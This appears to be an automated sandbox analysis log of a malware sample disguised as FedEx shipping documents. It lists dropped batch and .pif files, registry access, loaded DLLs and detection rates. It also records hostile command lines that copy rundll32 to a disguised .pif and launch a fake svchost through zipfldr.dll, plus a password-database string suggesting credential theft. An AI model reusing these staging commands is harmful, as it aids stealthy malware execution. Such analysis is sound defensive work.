Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Command line argument: 08A	7_2_00413780
Source: C:\Users\Public\ndpha.pif	Command line argument: WLDP.DLL	9_2_00594136
Source: C:\Users\Public\ndpha.pif	Command line argument: localserver	9_2_00594136

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hzwdvhxM.pif, 00000007.00000003.1714043812.000000002A82D000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1856971438.0000000026D9C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1925955441.000000002B9DC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	ReversingLabs: Detection: 64%
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Virustotal: Detection: 62%

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

File read: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe"
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Mxhvdwzh.PIF "C:\Users\Public\Libraries\Mxhvdwzh.PIF"
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Mxhvdwzh.PIF "C:\Users\Public\Libraries\Mxhvdwzh.PIF"
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Process created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Section loaded: msasn1.dll	Jump to behavior
